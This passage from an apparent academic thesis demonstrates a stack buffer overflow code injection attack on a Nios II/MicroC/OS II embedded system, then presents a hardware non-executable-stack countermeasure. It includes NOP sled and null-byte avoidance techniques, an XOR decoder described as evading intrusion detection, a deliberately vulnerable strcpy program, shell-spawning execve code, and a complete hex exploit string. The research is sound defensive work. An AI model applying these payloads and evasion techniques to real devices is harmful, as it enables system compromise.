To increase the chances of success, the attacker combines a technique called the "NOP Sled" with the approximate stack address found earlier [2, 5]. The NOP Sled technique pads a few No-Operation (NOP) op-codes onto the front of the exploit code. This way the attackers succeed in executing their injected (exploit) code if they are able to point the injected return address anywhere within this NOP instruction region. The processor simply slides through the NOP instructions until it starts executing the exploit code. A NOP can be any instruction which does not have an effect on the processor state. Since r0 is a constant register with a value of zero, Nios II implements NOP as 'add r0, r0, r0' [1]. Figure 3.2 and Figure 3.3 further elaborate the concept of the NOP Sled.
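Why the sled helps can be expressed as a simple range test on the guessed return address. The sketch below is a model only: the function name and its parameters are illustrative, the sled length is assumed to be a multiple of four bytes, and the alignment test reflects the 32-bit width of Nios II instructions.

```c
#include <stdint.h>

/* Returns 1 if a guessed return address would start execution somewhere
 * useful, 0 otherwise. Without a sled (sled_len == 0) only the exact
 * start of the exploit code works; with a sled, any word-aligned address
 * inside the sled also works, because execution slides forward into the
 * exploit code that follows it. */
static int guess_succeeds(uint32_t guess, uint32_t sled_start,
                          uint32_t sled_len)
{
    uint32_t code_start = sled_start + sled_len;

    if (guess % 4u != 0)          /* instructions are 4 bytes wide */
        return 0;
    return guess >= sled_start && guess <= code_start;
}
```

In this model the number of return addresses that work grows from one to sled_len / 4 + 1, which is why a longer sled makes an approximate stack address sufficient.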

Figure 3.2: Buffer overflow without NOP Sled

To find the approximate buffer address, the attacker starts with the initial stack address obtained by running the program in Figure 3.1 and then gradually increments or decrements this address. The NOP Sled technique, combined with this guesswork, gives the attacker a high probability of pointing the return address somewhere into the NOP region after a few trials.

A possible setback for the attacker in this step is a return address that contains a “null byte”. A null byte marks the end of a string, so string operations such as 'strcpy' stop copying as soon as one is encountered, and a stack smashing attack, which relies on overwriting the return address, cannot succeed if the copy stops part way through the address. Only a null byte in the last byte of the address, as stored in memory, will mostly not be a problem, since the return address is generally the last word in the exploit string and the string terminator itself supplies that byte. Because the Nios II is little endian [1], the last byte stored is the most significant one. Hence an address of the form 0x00YYYYYY (where Y can take values 0-F in hexadecimal notation), such as the address 0x0081ab10 used in Chapter 4, can still be injected, whereas addresses of the form 0xYY00YYYY, 0xYYYY00YY or 0xYYYYYY00 cannot.

Figure 3.3: Buffer overflow with NOP Sled


Note that if the attackers are targeting an open source program, or if they are in possession of the target program, they can easily run gdb (the GNU Debugger) or similar tools at their end to get a very good approximation of the buffer location.

3.4 Develop and inject the exploit string (code)

The exploit string can be injected in any of the following ways [39]:

• User input (e.g. typing into a web browser, command line argument passing, program reading input from a file)

• Network connection (e.g. large packets of data)

• Environment variables (e.g. program search path)

Most of the attacks inject code, which is processor and operating system dependent, to spawn a new shell with root privileges.

The process of exploit code development involves writing a C program and then using a tool like the GNU Debugger [2] to obtain the equivalent assembly instructions. For example, the C code for spawning a new shell is shown in Figure 3.4 [2, 54]. This program makes an 'execve' system call to execute '/bin/sh'. The prototype of 'execve' is [55]:

int execve(const char *filename, char *const argv[], char *const envp[]);

'execve' executes the program pointed to by 'filename'; 'argv' is an array of argument strings passed to the new program and 'envp' is used to pass environment variables to the new program [55]. The program in Figure 3.4 is then compiled and disassembled with the GNU Debugger to obtain the equivalent assembly instructions.

#include <stdio.h>
#include <unistd.h>

int main(void)
{
    char* argv[2];

    argv[0] = "/bin/sh";
    argv[1] = NULL;

    /* Replace the current process image with /bin/sh */
    execve(argv[0], argv, NULL);

    return 0;
}

Figure 3.4: C Program to spawn a new shell [2, 54]

The Hardware Abstraction Layer (HAL) [56] of the Nios II is a runtime library that provides a device driver interface for programs to communicate with the underlying hardware. The Nios II HAL API (Application Program Interface) does not support the 'execve' system call. Calls to execve() always fail with the return code -1 and errno set to ENOSYS [56].

Hence, instead of attempting to spawn a new shell, this work demonstrates how to change the program execution flow. The code to change the program execution flow is discussed in Chapter 4.

Irrespective of the attacker's motive, whether to spawn a new shell or to change the program execution flow, the attacker will most probably face the problem of “null bytes” in the exploit code, similar to the previous step (step 3). In the exploit code, a null byte in any position of an instruction word (0x00YYYYYY, 0xYY00YYYY, 0xYYYY00YY or 0xYYYYYY00) is a problem, because string copying stops as soon as the 'strcpy' library function sees a null byte.
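The effect of an embedded null byte on a 'strcpy' based copy can be reproduced on a host machine with the minimal sketch below. The helper name copied_length and the sample payload are illustrative assumptions and not part of the thesis code; the last four payload bytes are the little-endian layout of the word 0x08001381, the encoded 'jmpi' instruction used as the example in this section.

```c
#include <stddef.h>
#include <string.h>

/* Copies src into dst with strcpy and returns how many payload bytes
 * (terminator excluded) actually arrived in dst. dst must be large enough;
 * this models the copy itself, not a safe replacement for it. */
size_t copied_length(char *dst, const char *src)
{
    strcpy(dst, src);
    return strlen(dst);
}

/* Hypothetical payload: three filler bytes followed by 0x08001381 stored
 * least significant byte first (81 13 00 08). The embedded 0x00 ends the
 * copy early, so the final 0x08 never reaches the destination. */
static const char sample_payload[] = "\x41\x42\x43\x81\x13\x00\x08";
```

Calling copied_length on sample_payload with a 16-byte destination copies only the five bytes in front of the null byte, although the array holds seven payload bytes.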


For example, assume that the exploit code uses the following Nios II instruction, which causes the processor to next execute the instruction at memory location 0x00800138.

jmpi 0x20004e

In terms of register operations, the above instruction does the following [1]:

PC ← (PC[31..28] : 0x20004e × 4)

Here PC stands for the Program Counter register, which contains the address of the next instruction to be executed, and ':' denotes concatenation of the upper four PC bits with the scaled immediate value. When encoded into a Nios II binary instruction, the above instruction becomes [1]:

0x08001381

Here '0x' indicates hexadecimal notation. It can be seen that the encoded instruction has a null byte in it (it is of the form 0xYY00YYYY). Null bytes in the exploit code can be eliminated using one of the following techniques, which are described in detail below:

1. Choose a different set of instructions and data types (byte, half word level) [2, 5]

2. Choose appropriate registers

3. Replace a single byte with a null byte during run time

4. Encode and decode the exploit code [5]
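The 'jmpi' example above can be checked with a short host-side sketch. The function names are our own, and the J-type field layout (a 26-bit immediate above a 6-bit opcode) and the opcode value 0x01 are assumptions that are consistent with the encoding 0x08001381 quoted above; they should be verified against the Nios II reference [1].

```c
#include <stdint.h>

#define NIOS2_OP_JMPI 0x01u   /* assumed opcode, consistent with 0x08001381 */

/* J-type layout (assumed): IMM26 in bits 31..6, OP in bits 5..0. */
uint32_t encode_jmpi(uint32_t imm26)
{
    return ((imm26 & 0x03FFFFFFu) << 6) | NIOS2_OP_JMPI;
}

/* PC <- (PC[31..28] : IMM26 x 4) */
uint32_t jmpi_target(uint32_t pc, uint32_t imm26)
{
    return (pc & 0xF0000000u) | ((imm26 & 0x03FFFFFFu) << 2);
}

/* Returns 1 if any of the four bytes of word is 0x00, otherwise 0. */
int has_null_byte(uint32_t word)
{
    for (int i = 0; i < 4; i++) {
        if (((word >> (8 * i)) & 0xFFu) == 0)
            return 1;
    }
    return 0;
}
```

With an immediate of 0x20004e the sketch yields the word 0x08001381 and the target 0x00800138, and has_null_byte flags that word as unusable in a string based injection.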


3.4.1 Choose a different set of instructions and data types [2, 5]

Most processors provide a rich set of instructions to choose from. For example, the Nios II 'jmpi 0x20004e' instruction, which has a null byte when encoded, can also be implemented using the instructions shown in Figure 3.5.

Assembly instructions        Binary equivalent
xor   r5, r5, r5             0x294af03a
xorhi r5, r5, 0x0080         0x2940203c
addi  r5, r5, 0x0138         0x29404e04
callr r5                     0x283ee83a

Figure 3.5: Nios II 'jmpi 0x20004e' equivalent instructions without null bytes

The alternate instructions in Figure 3.5 are free of null bytes when encoded. We first clear register r5 to '0' using 'xor r5, r5, r5', then transfer 0x0080 and 0x0138 into the high and low halfwords of register r5 using the 'xorhi r5, r5, 0x0080' and 'addi r5, r5, 0x0138' instructions respectively. Finally we call the subroutine at the address contained in 'r5', which is 0x00800138.

Hence, by using alternate instructions and byte or half word level operations, we can get rid of the null bytes in the instruction encoding.
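Candidate instructions can be screened for null bytes before they are placed in an exploit string by encoding them on a host machine. The sketch below is a minimal illustration under stated assumptions: the function names are hypothetical, and the I-type and R-type field layouts and the opcode values used in the usage note (0x04 for 'addi', extended opcodes 0x1e for 'xor' and 0x1d for 'callr') are taken to be those of the Nios II instruction set [1] and should be verified there.

```c
#include <stdint.h>

/* I-type (assumed layout): A[31..27] B[26..22] IMM16[21..6] OP[5..0].
 * For 'addi rB, rA, imm' the source register is A and the destination is B. */
uint32_t encode_itype(unsigned a, unsigned b, uint16_t imm16, unsigned op)
{
    return ((uint32_t)(a & 31u) << 27) | ((uint32_t)(b & 31u) << 22) |
           ((uint32_t)imm16 << 6) | (uint32_t)(op & 63u);
}

/* R-type (assumed layout): A[31..27] B[26..22] C[21..17] OPX[16..11],
 * five zero bits, and the fixed opcode 0x3a in bits 5..0. */
uint32_t encode_rtype(unsigned a, unsigned b, unsigned c, unsigned opx)
{
    return ((uint32_t)(a & 31u) << 27) | ((uint32_t)(b & 31u) << 22) |
           ((uint32_t)(c & 31u) << 17) | ((uint32_t)(opx & 63u) << 11) | 0x3Au;
}
```

Under these assumptions, encode_rtype(5, 5, 5, 0x1e) gives 0x294af03a for 'xor r5, r5, r5', encode_itype(5, 5, 0x0138, 0x04) gives 0x29404e04 for 'addi r5, r5, 0x0138', and encode_rtype(5, 0, 31, 0x1d) gives 0x283ee83a for 'callr r5'.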

3.4.2 Choose appropriate registers

In Figure 3.5, the first two instructions 'xor r5, r5, r5' and 'xorhi r5, r5, 0x0080' can effectively be combined into the single instruction 'xorhi r5, r0, 0x0080' (since r0 is always zero in the Nios II [1]). But 'xorhi r5, r0, 0x0080' when encoded will have null bytes in it. Hence choosing appropriate registers helps avoid null bytes in the instruction encoding.


3.4.3 Replace a single byte with a null byte during run time

The general structure of the exploit string with NOP Sled is shown in Figure 3.6. From section 2.2, we know that the execution of the exploit code starts after the function epilogue is completed. The function epilogue restores the stack pointer (sp) to its initial value, which in the case of the Nios II processor points to the memory location just above the return address (functions that take variable arguments will have a slightly different scenario [1]).

Figure 3.6: Exploit string structure in the stack frame

Hence if the exploit code has a single null byte, based on Figure 3.6, we can work out the location of the null byte in the exploit code relative to the stack pointer (sp). To avoid the null byte problem, we first change the null byte to a non-null byte (1F, FF, etc.) and append a few instructions before the exploit code. During program execution, the appended instructions replace the non-null byte with a null byte in the exploit code. The structure of the exploit string in this case is shown in Figure 3.7.

Figure 3.7: Exploit string structure with instructions appended

Assuming that the location of the null byte is 6 bytes away from the stack pointer (sp), the instructions to append before the exploit code are shown in Figure 3.8. The value 6 in the 'stb r5,-6(sp)' instruction has to be modified before injection according to the location of the null byte.

xor r5, r5, r5        # generate null byte in r5
stb r5, -6(sp)        # store null byte in place of 'ff', '1f', etc.

Figure 3.8: Instructions that replace non-null byte with null byte
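The effect of the two instructions in Figure 3.8 can be modeled on a host machine with a byte array standing in for the stack. This is only a sketch: the function names, the array and the index used as 'sp' are assumptions made for illustration, and the placeholder word 0x08ff30c1 in the usage note is the one that appears later in Chapter 4.

```c
#include <stdint.h>
#include <stddef.h>

/* Reads a 32-bit little-endian word from mem at byte offset off. */
uint32_t load_le32(const uint8_t *mem, size_t off)
{
    return (uint32_t)mem[off] | ((uint32_t)mem[off + 1] << 8) |
           ((uint32_t)mem[off + 2] << 16) | ((uint32_t)mem[off + 3] << 24);
}

/* Models 'xor r5, r5, r5' followed by 'stb r5, -distance(sp)':
 * a zero byte is stored distance bytes below the modeled stack pointer. */
void patch_null_byte(uint8_t *mem, size_t sp, size_t distance)
{
    uint8_t r5 = 0;               /* xor r5, r5, r5 */
    mem[sp - distance] = r5;      /* stb r5, -distance(sp) */
}
```

If the four bytes below the return address hold c1 30 ff 08 (the word 0x08ff30c1) and the return address occupies the four bytes directly below 'sp', then patch_null_byte with a distance of 6 turns the word into 0x080030c1.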

3.4.4 Encode and decode the exploit code

Section 3.4.3 dealt with the case in which the exploit code has just one null byte. In the case of multiple null bytes, encoding the exploit code is an option to consider. As explained below, encoding the exploit code makes it polymorphic (i.e., the same exploit code gets translated into different binary data depending on the key used to encode) and almost no Intrusion Detection System (IDS) will be able to detect it [5].

In this technique, the attacker encodes the exploit code, which has null bytes, to make it null byte free and then places a decoder (a set of instructions) before the encoded exploit code. During program execution, the decoder decodes the encoded exploit code to recover the original exploit code with its null bytes. The exploit string in this case is very similar to the one in section 3.4.3 and is shown in Figure 3.9.

Figure 3.9: Exploit string structure with decoder instructions appended

Foster et al. [5] suggest adding a random number to the exploit code as one of the encoding schemes. The decoder then subtracts this number from each of the encoded exploit code bytes to obtain the original exploit code with null bytes. In this work, instead of adding, we chose to exclusive or (XOR) each exploit code byte with a random number (key) to get rid of the null bytes. The process of XORing with a different key is repeated until we obtain null byte free encoded exploit code. The reasons for using the XOR function to encode instead of adding a random number are:

• XOR is also a reversible transformation (A XOR Key XOR Key = A)

• This potentially avoids null bytes in the Nios II 'subi' instruction required by the decoder
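The key selection described above can be sketched in a few lines of host-side C. The function names are hypothetical; the only property relied upon is that XORing a byte with the key yields zero exactly when the byte equals the key, so a usable key is any value that does not occur among the exploit code bytes.

```c
#include <stdint.h>
#include <stddef.h>

/* XORs every byte of buf with key, in place. Applying the function a
 * second time with the same key restores the original bytes. */
void xor_bytes(uint8_t *buf, size_t len, uint8_t key)
{
    for (size_t i = 0; i < len; i++)
        buf[i] ^= key;
}

/* Returns 1 if encoding code with key leaves no 0x00 byte, otherwise 0. */
int key_is_usable(const uint8_t *code, size_t len, uint8_t key)
{
    for (size_t i = 0; i < len; i++) {
        if ((uint8_t)(code[i] ^ key) == 0)
            return 0;
    }
    return 1;
}
```

For the bytes 81 13 00 08 (the word 0x08001381 stored least significant byte first), a key of 4 is usable and produces 85 17 04 0c, whereas keys of 0 and 8 are rejected because they leave a null byte in the result.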

The decoder can be implemented using the instructions shown in Figure 3.10 and is further explained as follows:

a. The movi instruction in line 1 moves the length of the exploit code (i.e. the encoded code) multiplied by 16 into register r7. If we just load the value of the exploit code length (4 bytes in this case), without the multiplication factor, the instruction when translated into its binary equivalent will have null bytes in it. Hence, in order to avoid null bytes in this instruction, the length is multiplied by some constant (16 in this case).

b. The movi instruction in line 2 loads register r15 with the decoding key (4 in this case).

c. The mov instruction in line 3 copies the value of the stack pointer into register r21.

d. The ldbu instruction in line 4 loads the data present at memory location [r21-8] into register r5. When this instruction is executed for the first time, r5 will contain the first byte of the (encoded) exploit code segment. Later, as the value of r21 changes (instructions in lines 8 and 9), the data loaded into r5 will be the next byte of the exploit code segment.

e. The xor instruction in line 5 does an exclusive or (XOR) of the data loaded into r5 with the decoding key loaded into r15.

f. The stb instruction in line 6 stores the decoded byte back to its original location.

g. The addi instruction in line 7 decrements register r7 so that the decoder knows exactly when to stop decoding.

h. The addi instructions in lines 8 and 9 effectively increase r21 by 1. The reason for not directly using 'addi r21, r21, 1' is to avoid null bytes. Incrementing r21 by 1 lets the decoder access the next byte of the encoded exploit code segment using the instruction in line 4.

i. The bne instruction in line 10 checks whether the decoder has finished decoding all of the exploit code by checking the value of r7. If r7 is non-zero, the decoder continues to fetch and decode each byte of the encoded data. The decoder's work is done as soon as r7 becomes zero.

1.  movi r7, 64        # initialize a counter (r7) with code length * 16
2.  movi r15, 4        # initialize r15 with the key
3.  mov  r21, sp       # pointer to the encoded code
4.  ldbu r5, -8(r21)   # load the byte to be decoded
5.  xor  r5, r5, r15   # decode the loaded byte
6.  stb  r5, -8(r21)   # store back the decoded byte
7.  addi r7, r7, -16   # decrement the counter (to keep track of remaining code length)
8.  addi r21, r21, 5
9.  addi r21, r21, -4  # this and the above instruction effectively move the pointer to the next byte
10. bne  r7, r0, <4>   # continue this loop until all the injected data is decoded

Figure 3.10: Decoder instructions
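The control flow of the decoder can be traced with a C model in which local variables stand in for the registers and a byte array stands in for the stack. This is a sketch for following the loop, not the code that runs on the Nios II; the function name, the array and the index used as 'sp' are assumptions made for illustration.

```c
#include <stdint.h>
#include <stddef.h>

/* Models the ten decoder instructions of Figure 3.10. offset is the
 * displacement used by ldbu/stb (8 in Figure 3.10). Like the assembly
 * loop, the body runs at least once, so code_len must be at least 1. */
void run_decoder(uint8_t *mem, size_t sp, size_t code_len,
                 uint8_t key, size_t offset)
{
    uint32_t r7 = (uint32_t)code_len * 16u;   /* line 1: scaled counter   */
    uint8_t r15 = key;                        /* line 2: decoding key     */
    size_t r21 = sp;                          /* line 3: byte pointer     */
    do {
        uint8_t r5 = mem[r21 - offset];       /* line 4: ldbu             */
        r5 ^= r15;                            /* line 5: xor              */
        mem[r21 - offset] = r5;               /* line 6: stb              */
        r7 -= 16u;                            /* line 7: count down by 16 */
        r21 += 5;                             /* line 8                   */
        r21 -= 4;                             /* line 9: net effect is +1 */
    } while (r7 != 0);                        /* line 10: bne r7, r0      */
}
```

With four encoded bytes 85 17 04 0c located 8 bytes below the modeled stack pointer and a key of 4, the model restores 81 13 00 08 and leaves the return address bytes above them untouched.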


3.5 Code injection attack countermeasure

Programs running on most operating systems roughly adhere to the process memory layout shown in Figure 3.11.

The text section of the program stores the program code (instructions). The stack section stores temporary data such as function parameters and return addresses [71]. The data section contains global variables and the heap section is used for dynamically allocated data.

Figure 3.11: Program/process memory layout [71]

A non-executable stack area [4, 17, 18, 20] is one of the solutions for preventing successful execution of code injection attacks. This countermeasure can be implemented using virtual memory support, which requires modifying the operating system kernel.


3.5.1 Countermeasure implemented

However, MicroC/OS II does not support virtual memory for the Nios II processor. Hence, instead of modifying the operating system kernel, we implement a purely hardware based countermeasure to provide a non-executable stack region.

Figure 3.12: An example Nios II System [1]

It can be seen from Figure 3.12 that the Nios II architecture supports separate instruction and data buses. The data bus connects to both memory and peripheral components through the master port [1]. The instruction bus also connects to the same memory (but not to the peripheral components) through the master port [1]. Hence we can classify it as a “Pseudo Harvard architecture” or “Modified Harvard architecture” [75], since the classical “Harvard architecture” has separate memories and buses for instructions and data [75, 76]. Also, in the classical “Harvard architecture” the data and program memory can differ in word width [75].

Imagine a scenario wherein we connect a single SRAM memory to the data bus only, using the tristate bridge shown in Figure 3.12. In that case the processor can never fetch the contents of the SRAM memory as instructions.

Therefore, using Altera's SOPC builder [13], we build a Nios II system with an exclusive SRAM data memory and then, using the Nios II IDE [56], allocate the read/write data portion of the program to this dedicated memory as shown in Figure 3.13. It should be noted that 'Stack memory' listed in Figure 3.13 refers to the stacks used for task creation [7], not to the function call stacks. Function call stacks come under the category 'read/write data memory'.

Hence even if the attacker is able to successfully generate and inject his exploit code, it will not be executed since the exploit code is not accessible to the instruction bus.


Figure 3.13: Allocation of read/write memory region to SRAM using Nios II IDE

Table 3.1 shows available SRAM memory in various Altera development boards.

Board    Available SRAM memory
DE1      256K by 16 bits
DE2      256K by 16 bits
UP3      64K by 16 bits

Table 3.1: Available SRAM memory in Altera boards

3.5.2 Other approaches considered

One of the approaches initially thought of was to have a separate thread (task) to check for the processor program counter (PC) value of other tasks and alert the user whenever the value of PC is within the data memory range.


But this approach does not work with MicroC/OS II, since each thread has its own set of CPU registers and its own stack area. Hence it is not possible to access the information of one thread from another thread in order to generate an exception. This is illustrated in Figure 3.14.

Figure 3.14: Multiple task process control blocks [7]

A second approach considered was to add glue logic to the processor core to compare the PC with a predefined data memory range, which requires access to the PC register in the processor core. Since the Nios II processor is a proprietary processor, this approach could not be implemented. An open source processor is an option for this approach, but we would also need a corresponding C compiler to handle the processor modifications.
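The comparison that such glue logic would perform can be expressed as a simple range check. The C function below is only a software model of that check, written for illustration; the function name is our own, and the region bounds in the usage note are hypothetical values, since the actual address map depends on the system built.

```c
#include <stdint.h>

/* Returns 1 if pc lies inside [data_base, data_base + data_size), else 0.
 * The unsigned subtraction wraps around for pc < data_base, which makes
 * the single comparison cover both bounds. */
int pc_in_data_region(uint32_t pc, uint32_t data_base, uint32_t data_size)
{
    return (uint32_t)(pc - data_base) < data_size;
}
```

For instance, with a hypothetical 512 KB data region starting at 0x00200000, a PC value of 0x002038d4 would be flagged, while a PC value of 0x0080030c in the instruction memory would not.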

3.6 Buffer overflow in complex programs

Most real life stack based buffer overflow attacks target simple function call programs. But buffer overflow is also possible in complex programs with recursive function calls. One such example is mentioned in [74]. The attack might need a larger number of attempts using the NOP Sled technique because the actual buffer location on the stack can be too far from the approximate stack address found by executing the simple program in Figure 3.1.

3.7 Conclusion

In this chapter we have discussed various steps, hindrances and ways to overcome the null byte problem in order to perform a code injection attack. We also discussed how to prevent execution of the exploit code with the help of an exclusive data memory in the Nios II system.

Chapter 4 will demonstrate all these concepts with the help of the Nios II processor, Nios II IDE and SOPC builder.


4. RESULTS

This chapter demonstrates the code injection attack and its prevention using the Nios II IDE (version 10.1) [56], Nios II processor [1], MicroC/OS II RTOS Kernel [7] and SOPC builder (version 10.1) [13].

4.1 Initial stack address

The program shown in Figure 4.1 calculates and prints the initial stack address of the system the attacker is trying to exploit. The program is written in the C language using MicroC/OS II. Executing this program is required before the actual attack.

The 'main' function of this program first creates a task 'task1' using the OSTaskCreateExt() function by passing task1's address along with other arguments [13]. Then the OSStart() function runs the highest priority task that is 'Ready' to run [13]. OSTaskCreateExt() and OSStart() are more typically found in a multitasking application. In the present case, the attacker just needs to find the initial stack address and one task is enough.

The task „task1‟ in turn calls a function which returns the value of the stack pointer (sp). The value is then printed on to the console, which is, for this system:

0x81ab10

Note that the above value is specific to the Nios II and MicroC/OS II system being used. The value may change if the address mapping, memory capacity, processor or kernel of the system changes. The output of the program in Figure 4.1 will then be used by the attacker to guess the approximate starting address of the vulnerable buffer.

/* C program using MicroC/OS II to find the approximate stack starting address */
#include "string.h"
#include <stdio.h>
#include "includes.h"

/* Definition of Task stack */
#define TASK_STACKSIZE 2048
OS_STK task1_stk[TASK_STACKSIZE];

/* Definition of Task priority */
#define TASK1_PRIORITY 1

/* Moves the value of sp into r2, the Nios II return-value register */
unsigned long get_sp(void)
{
    asm(" mov r2, sp");
}

/* Prints the value of the stack address */
void task1(void* pdata)
{
    printf("0x%lx\n", get_sp());
}

/* The main function creates one task */
int main(void)
{
    OSTaskCreateExt(task1,
                    NULL,
                    (void *)&task1_stk[TASK_STACKSIZE-1],
                    TASK1_PRIORITY,
                    TASK1_PRIORITY,
                    task1_stk,
                    TASK_STACKSIZE,
                    NULL,
                    0);
    OSStart();

    return 0;
}

Figure 4.1: C program to find stack address using MicroC/OS II

4.2 The vulnerable program

Consider the hypothetical program in Figure 4.2. This program has a C function 'process_input' that processes a string passed from the task 'task1'. It can be seen that the 'process_input' function uses the 'strcpy' library function, which is vulnerable to buffer overflows. The 'critical_function' is not called anywhere in the program, hence it is never executed.

The output of the program in Figure 4.2 is:

Processing called function....!!
In main function executed assignment of x. The value of x is 1


/* A buffer overflow vulnerable C program using MicroC/OS II */
#include "string.h"
#include <stdio.h>
#include "includes.h"

/* Definition of Task Stack */
#define TASK_STACKSIZE 2048
OS_STK task1_stk[TASK_STACKSIZE];
#define TASK1_PRIORITY 1

/* The data passed is copied into a local buffer without a length check */
void process_input(char *stringpassed)
{
    char name[90];
    strcpy(name, stringpassed);
    printf("Processing called function....!!\n");
    return;
}

/* 1. Calls the function. 2. Prints the value of x */
void task1(void* pdata)
{
    int x = 0;
    x *= 2;
    process_input("someinputpassed");
    x = 1;
    printf("In main function executed assignment of x. The value of x is %d \n", x);
}

/* The main function creates one task */
int main(void)
{
    OSTaskCreateExt(task1,
                    NULL,
                    (void *)&task1_stk[TASK_STACKSIZE-1],
                    TASK1_PRIORITY,
                    TASK1_PRIORITY,
                    task1_stk,
                    TASK_STACKSIZE,
                    NULL,
                    0);
    OSStart();
    return 0;
}

/* Target function for the attack */
void critical_function()
{
    printf("Hacked: The flow has been successfully changed\n");
}

Figure 4.2: A buffer overflow vulnerable program

4.3 The attack

The code injection attack (refer to section 2.2 for details) executes the code injected onto the stack, primarily to spawn a new shell. This work instead targets changing the program execution flow by executing code on the stack (similar to the 'Twilight Hack' on the Wii in 2008 [66]).

The attacker's objective is to make the program in Figure 4.2 execute 'critical_function' when the 'process_input' function returns, instead of executing the 'x=1;' statement. For the current Nios II and MicroC/OS II system, the address of 'critical_function' in the memory space (0x0080030c) can be found using the 'nios2-elf-objdump' utility (refer to the tutorial section in the appendix). In general, Ltrace, gdb or similar utilities [5, 72] will be used. In the case of the “Twilight Hack”, since the target code ('critical_function' in Figure 4.2) was always saved by the attacker in the SD memory slot, the address was constant due to memory mapping.

As discussed in section 3.2, the attacker first passes an arbitrary string '1234567890' (of length 10) to the function to see if the program malfunctions. The attacker observes that a string of length 10 has no effect on the program and the output is still the same. The attacker continues this process with longer strings until the program malfunctions, in this case for the string

'123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456'

of length 96. But the attacker also has to consider the null byte which is appended at the end of each string. Hence the effective length is 96+1=97 bytes.

But C compilers allocate memory in multiples of the word size, implying that the effective buffer length (L) is 100 bytes. Note that L is not exactly equal to the vulnerable buffer length. L is the distance from the start of the buffer to the „return address‟ memory location.


The attacker now knows the initial stack address and the effective length of the buffer. At this stage the attacker uses the NOP sled technique (refer to section 3.3 for details) with the initial stack address (found in section 4.1) to point the new return address (ra) into the buffer region. Figure 4.3 further explains the structure of the attacker input (also known as the exploit string) at this stage.

Figure 4.3: Exploit string

The next step is to develop the exploit code. As described earlier, the objective of the exploit code is to execute the 'critical_function' located at memory location 0x0080030c. This can be easily achieved using the 'callr' instruction of the Nios II processor [1]. The attacker first stores the value 0x0080030c in some register, say r5, and later uses the 'callr' assembly instruction, which transfers execution to the address contained in 'r5'. The complete code is shown in Figure 4.4.

orhi  r5, r0, 0x0080
addi  r5, r5, 0x030c   # this and the above instruction load the target address in r5
callr r5

Figure 4.4: Nios II instructions that call the subroutine at 0x0080030c


Hence the attacker has exploit code of length 12 bytes (3 instructions x 4 bytes per instruction). But the effective buffer length is 100 bytes. The remaining 84 (=100-12-4) bytes can be filled with NOP instructions for the NOP Sled. This is illustrated in Figure 4.5.

Figure 4.5: Exploit string components' length
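The length arithmetic used so far (97 bytes rounded up to 100, and 84 bytes left over for the sled) can be written down as two small helper functions. This is a minimal sketch; the function names are our own and the 4-byte word, instruction and return address sizes are those of the Nios II system described in this chapter.

```c
#include <stddef.h>

/* Rounds n up to the next multiple of word (word must be non-zero). */
size_t round_up(size_t n, size_t word)
{
    return ((n + word - 1) / word) * word;
}

/* Number of 4-byte NOPs that fit in front of the exploit code once the
 * code and the 4-byte return address are accounted for. Returns 0 if the
 * code and the return address do not fit in effective_len at all. */
size_t sled_nop_count(size_t effective_len, size_t code_bytes)
{
    const size_t ret_bytes = 4;
    if (effective_len < code_bytes + ret_bytes)
        return 0;
    return (effective_len - code_bytes - ret_bytes) / 4;
}
```

For the values in this section, round_up(96 + 1, 4) gives the effective length of 100 bytes, and sled_nop_count(100, 12) gives 21 NOP instructions.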

The Nios II processor implements the NOP instruction as 'add r0, r0, r0' [1]. But 'add r0, r0, r0' when encoded will have null bytes in it. To avoid this problem, the attacker can implement the NOP as 'xor r5, r5, r5'. This instruction simply clears r5. The complete exploit string instructions are shown in Figure 4.6.


Figure 4.6: Instructions in the exploit string

To supply (input) a string in hexadecimal format to C programs, we need to use the '\x' escape sequence for each byte. Since the Nios II architecture is little endian [1], the equivalent input string for the 'xor r5, r5, r5' instruction is '\x3a\xf0\x4a\x29'. Hence the attacker input (i.e., the argument for the 'process_input' function of the program in Figure 4.2) in this case is shown in Figure 4.7.

\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a \xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0 \x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a \x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29 \x34\x20\x40\x01\x04\xc3\x40\x29\x3a\xe8\x3e\x28\x10\xab\x81\x00

Figure 4.7: Exploit string binary equivalent of Figure 4.6
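The byte layout of Figure 4.7 can be reproduced from the 32-bit instruction words with a short host-side sketch. The function names are hypothetical and the code only illustrates the little-endian serialization and the ordering of the three parts (NOP sled, exploit code, return address); the instruction words are read off the bytes shown in Figure 4.7.

```c
#include <stdint.h>
#include <stddef.h>

/* Writes word to out[0..3], least significant byte first. */
void store_le32(uint8_t *out, uint32_t word)
{
    out[0] = (uint8_t)(word & 0xFFu);
    out[1] = (uint8_t)((word >> 8) & 0xFFu);
    out[2] = (uint8_t)((word >> 16) & 0xFFu);
    out[3] = (uint8_t)((word >> 24) & 0xFFu);
}

/* Fills out[0..total_len-1] as: NOP sled | code words | return address.
 * Returns the number of NOP words written, or -1 if total_len is not a
 * multiple of 4 or is too small for the code and the return address. */
int build_layout(uint8_t *out, size_t total_len, uint32_t nop,
                 const uint32_t *code, size_t code_words, uint32_t ret_addr)
{
    if (total_len % 4 != 0 || total_len < 4 * (code_words + 1))
        return -1;
    size_t nops = total_len / 4 - code_words - 1;
    size_t pos = 0;
    for (size_t i = 0; i < nops; i++, pos += 4)
        store_le32(out + pos, nop);
    for (size_t i = 0; i < code_words; i++, pos += 4)
        store_le32(out + pos, code[i]);
    store_le32(out + pos, ret_addr);
    return (int)nops;
}
```

With a total length of 100 bytes, the NOP word 0x294af03a, the three code words 0x01402034, 0x2940c304 and 0x283ee83a, and the return address 0x0081ab10, the sketch writes 21 NOPs followed by the same byte sequence that ends Figure 4.7.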


